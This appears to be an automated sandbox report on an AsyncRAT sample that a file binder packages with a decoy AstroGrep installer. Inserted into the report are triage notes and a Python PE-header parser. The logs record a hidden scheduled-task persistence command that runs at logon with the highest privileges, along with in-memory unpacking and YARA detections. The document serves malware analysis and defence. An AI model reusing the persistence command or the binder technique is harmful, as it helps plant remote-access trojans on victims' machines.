                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe''
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\astro-grep.exe C:\Users\user\AppData\Roaming\astro-grep.exe
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\astro-grep.exe 'C:\Users\user\AppData\Roaming\astro-grep.exe'
                            Source: C:\Users\user\Desktop\ms.exeProcess created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' Jump to behavior
                            Source: C:\Users\user\Desktop\ms.exeProcess created: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE 'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE' Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exitJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3 Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\astro-grep.exe 'C:\Users\user\AppData\Roaming\astro-grep.exe' Jump to behavior
                            Source: C:\Users\user\Desktop\ms.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Automated click: I Agree
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Automated click: Install
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Window detected: "< &Back" | "I &Agree" | "Cancel" | "Nullsoft Install System v3.0rc1" | "Nullsoft Install System v3.0rc1" | "License Agreement" | "Please review the license terms before installing AstroGrep v4.4.7." | "Press Page Down to see the rest of the agreement." | license text: GNU GENERAL PUBLIC LICENSE Version 2 June 1991 Copyright (C) 1989 1991 Free Software Foundation Inc. 59 Temple Place Suite 330 Boston MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs too. When we speak of free software we are referring to freedom not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish) that you receive source code or can get it if you want it that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software or if you modify it. For example if you distribute copies of such a program whether gratis or for a fee you must give the recipients all the rights that you have. You must make sure that they too receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software and (2) offer you this license which gives you legal permission to copy distribute and/or modify the software. Also for each author's protection and ours we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on we want its recipients to know that what they have is not the original so that any problems introduced by others will not reflect on the original authors' reputations. Finally any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses in effect making the program proprietary. To prevent this we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying distribution and modification follow. GNU GENERAL PUBLIC L
Source: ms.exe | Static file information: File size 1068032 > 1048576
Source: ms.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ms.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ms.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ms.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ms.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ms.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ms.exe | Static PE information: DllCharacteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: Re:\code\projects\c#\AstroGrep\svn\AdminProcess\obj\Release\AstroGrep.AdminProcess.pdb- | source: AstroGrep.AdminProcess.exe.5.dr
Source: Binary string: e:\code\projects\c#\AstroGrep\svn\AstroGrep.Common\obj\Release\AstroGrep.Common.pdb | source: AstroGrep.Common.dll.5.dr
Source: Binary string: C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb | source: ms.exe
Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net40-client\NLog.pdbSHA256 | source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr
Source: Binary string: c:\work\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\ICSharpCode.AvalonEdit.pdb | source: ICSharpCode.AvalonEdit.dll.5.dr
Source: Binary string: e:\code\projects\c#\AstroGrep\svn\libAstroGrep\obj\Release\libAstroGrep.pdb@ | source: libAstroGrep.dll.5.dr
Source: Binary string: .exe;.dll;.pdb;.msi;.sys;.ppt;.gif;.jpg;.jpeg;.png;.bmp;.class;.chm+{0}{4}{1}{4}{2}{4}{3} | source: AstroGrep.exe.5.dr
Source: Binary string: e:\code\projects\c#\AstroGrep\svn\libAstroGrep\obj\Release\libAstroGrep.pdb | source: libAstroGrep.dll.5.dr
Source: Binary string: &C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb | source: ms.exe
Source: Binary string: c:\work\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\ICSharpCode.AvalonEdit.pdbT | source: ICSharpCode.AvalonEdit.dll.5.dr
Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net40-client\NLog.pdb | source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr
Source: Binary string: e:\code\projects\c#\AstroGrep\svn\AdminProcess\obj\Release\AstroGrep.AdminProcess.pdb | source: AstroGrep.AdminProcess.exe.5.dr
Source: ms.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ms.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ms.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ms.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ms.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
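The static PE entries above (which data directories ms.exe carries, the section each one lands in, and the DllCharacteristics flags TERMINAL_SERVER_AWARE, DYNAMIC_BASE and NX_COMPAT) are worth reproducing yourself during triage, because the same fields tell you whether a dropped file was built by the same toolchain. The PDB path C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb in the binary strings is the build path of the Celesty Binder stub, a file-binder tool, which is consistent with ms.exe doing nothing but dropping the legitimate AstroGrep installer as a decoy next to the AsyncRAT payload ASTRO-GREP.EXE. The parser below is an added example and not code from the report or from any of the projects named in it: it reads the optional header and section table in pure Python (pefile is the usual tool, but this needs no dependency), and the PE32 header it builds for the stand-alone run is constructed to mirror the directory and section layout reported for ms.exe; it contains no code and is not the sample.

```python
"""Pure-Python PE header triage: DllCharacteristics mitigation flags, the data
directories that are present, and the section each directory RVA falls in.
Added example, not part of the report; the header built by build_sample_pe32()
is constructed to mirror the layout reported for ms.exe and is not the sample."""
import struct
import sys

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
                   "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG",
                   "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def parse_pe(data):
    """Return machine, mitigation flags, section names and the present data directories."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # IMAGE_FILE_HEADER follows the signature; the optional header follows it.
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt = pe_off + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:      # PE32
        ndirs_off = opt + 92
    elif magic == 0x20B:    # PE32+
        ndirs_off = opt + 108
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    sections = []
    for i in range(nsec):   # section table starts right after the optional header
        name, vsize, va, rsize = struct.unpack_from("<8sIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, max(vsize, rsize)))

    def section_for(rva):
        return next((n for n, va, size in sections if va <= rva < va + size), None)

    directories = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, ndirs_off + 4 + 8 * i)
        if rva and size:  # only directories the linker actually emitted
            directories["IMAGE_DIRECTORY_ENTRY_" + DIRECTORY_NAMES[i]] = (rva, size, section_for(rva))
    mitigations = [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dllchar & bit]
    return {"machine": machine, "dll_characteristics": mitigations,
            "sections": [s[0] for s in sections], "directories": directories}


def build_sample_pe32():
    """Constructed PE32 header only (no code, not a real binary): four sections and the
    directory/section layout reported for ms.exe, DYNAMIC_BASE|NX_COMPAT|TERMINAL_SERVER_AWARE."""
    sections = [(b".text", 0x1000, 0x5000), (b".rdata", 0x6000, 0x2000),
                (b".rsrc", 0x8000, 0x1000), (b".reloc", 0x9000, 0x1000)]
    dirs = {1: (0x6100, 0x50), 2: (0x8000, 0x800), 5: (0x9000, 0x200),
            6: (0x6200, 0x1C), 10: (0x6300, 0x40), 12: (0x6000, 0x100)}
    pe_off = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)).ljust(pe_off, b"\0")
    opt = bytearray(96 + 16 * 8)            # standard 0xE0-byte PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x8000)
    struct.pack_into("<I", opt, 92, 16)
    for idx, (rva, size) in dirs.items():
        struct.pack_into("<II", opt, 96 + 8 * idx, rva, size)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    sec_hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, size, va, size, 0, 0, 0, 0, 0, 0)
                        for n, va, size in sections)
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + sec_hdrs


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe32()
    info = parse_pe(data)
    print("DllCharacteristics:", ", ".join(info["dll_characteristics"]))
    for name, (rva, size, sec) in info["directories"].items():
        print("%-36s rva=0x%06x size=0x%x in %s" % (name, rva, size, sec))
```

Point it at a file to triage a real binary; with no argument it parses the constructed header and prints the same six directories and three mitigation flags the report lists. Note that DYNAMIC_BASE and NX_COMPAT only say the image opts in to ASLR and DEP; they say nothing about the unpacked AsyncRAT module that is loaded from a byte array later on.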

Data Obfuscation:

.NET source code contains potential unpacker
Source: ASTRO-GREP.EXE.1.dr, duhmNwaErqILFY/ZoByeBhDIf.cs | .Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: astro-grep.exe.3.dr, duhmNwaErqILFY/ZoByeBhDIf.cs | .Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs | .Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs | .Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 13.2.astro-grep.exe.770000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs | .Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 13.0.astro-grep.exe.770000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs | .Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.astro-grep.exe.430000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs | .Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.astro-grep.exe.430000.0.unpack, duhmNwaErqILFY/ZoByeBhDIf.cs | .Net Code: TdPzjIJpIFBoTqd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\ms.exe | Code function: 1_2_00A36260 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00A36260
Source: C:\Users\user\Desktop\ms.exe | Code function: 1_2_00A34485 push ecx; ret 1_2_00A34498
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Code function: 3_2_005F711F push cs; iretd 3_2_005F7202
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Code function: 3_2_005F7399 push es; ret 3_2_005F7608
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Code function: 3_2_005F710D push cs; iretd 3_2_005F7202
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Code function: 3_2_005F2F81 push eax; ret 3_2_005F2F95
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Code function: 3_2_005F2A66 push 0000003Eh; retn 0000h 3_2_005F2DC0
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Code function: 3_2_005F4122 push eax; ret 3_2_005F412C
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Code function: 3_2_00F2BE10 pushfd ; retf 3_2_00F2BE49
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 13_2_00772A66 push 0000003Eh; retn 0000h 13_2_00772DC0
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 13_2_00774122 push eax; ret 13_2_0077412C
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 13_2_0077711F push cs; iretd 13_2_00777202
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 13_2_00777399 push es; ret 13_2_00777608
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 13_2_00772F81 push eax; ret 13_2_00772F95
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 13_2_0077710D push cs; iretd 13_2_00777202
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 17_2_00432F81 push eax; ret 17_2_00432F95
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 17_2_0043710D push cs; iretd 17_2_00437202
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 17_2_00437399 push es; ret 17_2_00437608
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 17_2_0043711F push cs; iretd 17_2_00437202
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 17_2_00434122 push eax; ret 17_2_0043412C
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Code function: 17_2_00432A66 push 0000003Eh; retn 0000h 17_2_00432DC0
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\nsDialogs.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\StartMenu.dll
Source: C:\Users\user\Desktop\ms.exe | File created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dll
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | File created: C:\Users\user\AppData\Roaming\astro-grep.exe
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Program Files (x86)\AstroGrep\NLog.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Program Files (x86)\AstroGrep\AstroGrep.exe
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Program Files (x86)\AstroGrep\libAstroGrep.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\System.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe
Source: C:\Users\user\Desktop\ms.exe | File created: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\LangDLL.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Program Files (x86)\AstroGrep\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Program Files (x86)\AstroGrep\license.txt
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\Program Files (x86)\AstroGrep\readme.txt

Boot Survival:

Yara detected AsyncRAT
Source: Yara match | File source: ms.exe, type: SAMPLE
Source: Yara match | File source: 17.2.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ms.exe.a3f330.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.0.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.ms.exe.a3f330.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.ms.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.ms.exe.a3f330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ms.exe.a30000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ms.exe.a3f330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.195464436.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.310239259.0000000000432000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.259955019.0000000000432000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.460832273.0000000000772000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: astro-grep.exe PID: 748, type: MEMORY
Source: Yara match | File source: Process Memory Space: astro-grep.exe PID: 2792, type: MEMORY
Source: Yara match | File source: Process Memory Space: ASTRO-GREP.EXE PID: 5416, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\astro-grep.exe, type: DROPPED
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe''
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrep
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrep\AstroGrep.lnk
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrep\Uninstall AstroGrep.lnk
Source: C:\Users\user\Desktop\ms.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\ms.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Yara detected AsyncRAT
Source: Yara match | File source: ms.exe, type: SAMPLE
Source: Yara match | File source: 17.2.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ms.exe.a3f330.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.0.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
